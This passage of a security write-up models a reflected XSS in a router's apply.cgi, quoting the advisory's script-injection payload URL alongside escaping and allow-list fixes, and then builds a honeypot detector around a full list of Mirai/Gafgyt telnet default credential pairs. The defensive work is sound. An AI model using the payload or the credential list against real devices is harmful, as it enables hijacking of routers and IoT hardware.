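single-quoted JS string, so that is the template modelled here.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Sample URL #1 from the advisory, verbatim.
ADVISORY_URL = (
    "http://192.168.1.1/apply.cgi?submit_button="
    "%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27"
)

# Assumed shape of the inline script the CGI writes back (hypothetical).
TEMPLATE = "<script>\nvar submit_button = '{value}';\n</script>"

# submit_button names a page ("index", "Wireless_Basic", ...): a plain identifier.
PAGE_NAME = re.compile(r"[A-Za-z0-9_]{1,32}")


def submit_button_param(url: str) -> str:
    """Extract and percent-decode the submit_button query parameter."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("submit_button", [""])[0]


def render_vulnerable(value: str) -> str:
    """The reported behaviour: the value lands in the JS string unescaped."""
    return TEMPLATE.format(value=value)


def render_js_escaped(value: str) -> str:
    """Fix 1 (escape): emit a proper JS string literal and neutralise '/' so
    the text '</script>' can never terminate the enclosing script element.
    json.dumps escapes quotes, backslashes, control chars and non-ASCII."""
    literal = json.dumps(value).replace("/", r"\/")
    return "<script>\nvar submit_button = {};\n</script>".format(literal)


def is_valid_page_name(value: str) -> bool:
    """Fix 2 (allow-list): accept only a bare page identifier."""
    return PAGE_NAME.fullmatch(value) is not None


def render_allowlisted(value: str) -> str:
    """Fix 2 applied at the sink: reject anything that is not a page name."""
    if not is_valid_page_name(value):
        raise ValueError("submit_button must be a page name")
    return TEMPLATE.format(value=value)


def count_script_elements(html: str) -> int:
    """Mimic the HTML tokenizer's script-data state: once inside <script>, only
    a literal '</script' ends the element, so '<script>' inside a JS string is
    inert. More than one element means the injection escaped the string."""
    low = html.lower()
    count = pos = 0
    while True:
        start = low.find("<script", pos)
        if start < 0:
            return count
        count += 1
        end = low.find("</script", start)
        if end < 0:
            return count
        pos = end + len("</script")


if __name__ == "__main__":
    payload = submit_button_param(ADVISORY_URL)
    print("decoded submit_button:", payload)
    print("vulnerable  ->", count_script_elements(render_vulnerable(payload)), "script element(s)")
    print("js-escaped  ->", count_script_elements(render_js_escaped(payload)), "script element(s)")
    print("allow-list  ->", "rejected" if not is_valid_page_name(payload) else "accepted")
```

Two details of the payload are worth noting when reading the model. The leading `';` closes the original string literal and statement, and the trailing `'` re-opens a literal that the template's own closing `';` then terminates, so the page stays syntactically valid JavaScript and nothing fails loudly. And because the browser's HTML tokenizer ends a script element at the first literal `</script`, escaping the quote alone is not enough; the `/` must be escaped too (fix 1), or better, since `submit_button` only ever names a page, the parameter should be allow-listed as an identifier (fix 2). The advisory's point about HTTP Basic authentication matters for exploitability: the browser re-sends the credentials on every request, so an administrator who follows the crafted link runs the injected script with full access to the router's management interface.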
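The Securelist post above lists the telnet username/password pairs that Gafgyt and Mirai-style bots try against exposed devices, and describes honeypots that see tens of thousands of such attempts a day. The following is an added example, not code from the post or from Kaspersky: it turns the post's credential tables into a small detector that runs over honeypot authentication records. The log line format, the `SAMPLE_LOG` lines (documentation-range IP addresses) and the alert thresholds are constructed assumptions for this example.

```python
"""Telnet default-credential detector over honeypot log lines.

Added example, not part of the Securelist post: it takes the telnet
credential lists printed in the post and runs simple detection logic over
honeypot authentication records. The log line format and the SAMPLE_LOG
lines are constructed for this example; the IP addresses are documentation
ranges.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Credential pairs from the post's telnet table and the Gafgyt list.
IOT_DEFAULT_CREDS = {
    ("root", "xc3511"), ("root", "vizxv"), ("admin", "admin"), ("root", "admin"),
    ("root", "xmhdipc"), ("root", "123456"), ("root", "888888"), ("root", "54321"),
    ("support", "support"), ("root", "default"), ("root", "root"),
    ("admin", "password"), ("root", "anko"), ("root", ""), ("root", "juantech"),
    ("admin", "smcadmin"), ("root", "1111"), ("root", "12345"), ("root", "pass"),
    ("admin", "admin1234"), ("telnet", "telnet"), ("supervisor", "zyad1234"),
    ("root", "antslq"), ("root", "guest12345"), ("root", "tini"),
    ("root", "letacla"), ("root", "Support1234"),
}

# Assumed honeypot record format (constructed for this example):
#   <ISO-8601 UTC time> telnet <src_ip> login user=<user> pass=<password> result=<ok|fail>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) telnet (?P<src>[\d.]+) login "
    r"user=(?P<user>\S*) pass=(?P<pw>\S*) result=(?P<res>ok|fail)$"
)

# Constructed sample: one Mirai-style sweep, one legitimate-looking operator
# login, and one slow source that never crosses the window threshold.
SAMPLE_LOG = """\
2017-04-03T10:00:01Z telnet 203.0.113.5 login user=root pass=xc3511 result=fail
2017-04-03T10:00:02Z telnet 203.0.113.5 login user=root pass=vizxv result=fail
2017-04-03T10:00:03Z telnet 203.0.113.5 login user=admin pass=admin result=fail
2017-04-03T10:00:04Z telnet 203.0.113.5 login user=root pass=xmhdipc result=fail
2017-04-03T10:00:05Z telnet 203.0.113.5 login user=root pass=juantech result=ok
2017-04-03T10:05:00Z telnet 198.51.100.7 login user=operator pass=s3cret-one result=fail
2017-04-03T10:05:30Z telnet 198.51.100.7 login user=operator pass=s3cret-two result=ok
2017-04-03T11:00:00Z telnet 192.0.2.9 login user=root pass= result=fail
2017-04-03T11:30:00Z telnet 192.0.2.9 login user=root pass=root result=fail
"""


def parse_log(text: str) -> list:
    """Turn log lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "src": m["src"],
            "cred": (m["user"], m["pw"]),
            "ok": m["res"] == "ok",
        })
    return events


def detect_iot_bruteforce(events, min_distinct=3, window_seconds=60) -> dict:
    """Flag a source that tries >= min_distinct *different* known IoT default
    credentials within window_seconds. A single default pair is too noisy to
    alert on; a burst of distinct ones is the bot's wordlist being walked."""
    window = timedelta(seconds=window_seconds)
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["cred"] in IOT_DEFAULT_CREDS:
            by_src[ev["src"]].append(ev)
    findings = {}
    for src, hits in by_src.items():
        for i, first in enumerate(hits):
            in_window = [h for h in hits[i:] if h["ts"] - first["ts"] <= window]
            if len({h["cred"] for h in in_window}) >= min_distinct:
                findings[src] = {
                    "first_seen": first["ts"].isoformat(),
                    "default_creds_tried": len({h["cred"] for h in hits}),
                    "login_succeeded": any(h["ok"] for h in hits),
                }
                break
    return findings


def top_credentials(events, n=5) -> list:
    """Most-tried (user, password) pairs, the same view the post's tables give."""
    return Counter(ev["cred"] for ev in events).most_common(n)


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for src, info in detect_iot_bruteforce(evs).items():
        print("ALERT", src, info)
    print("top credentials:", top_credentials(evs, 3))
```

The detector keys on distinct default pairs inside a short window rather than on failed-login counts, which is what separates a bot walking the list in the post from an administrator mistyping a password. On a real honeypot the next step is the one the post takes: fetch the HTTP front page of each flagged source and group the alerts by the page title to see which device families are doing the scanning.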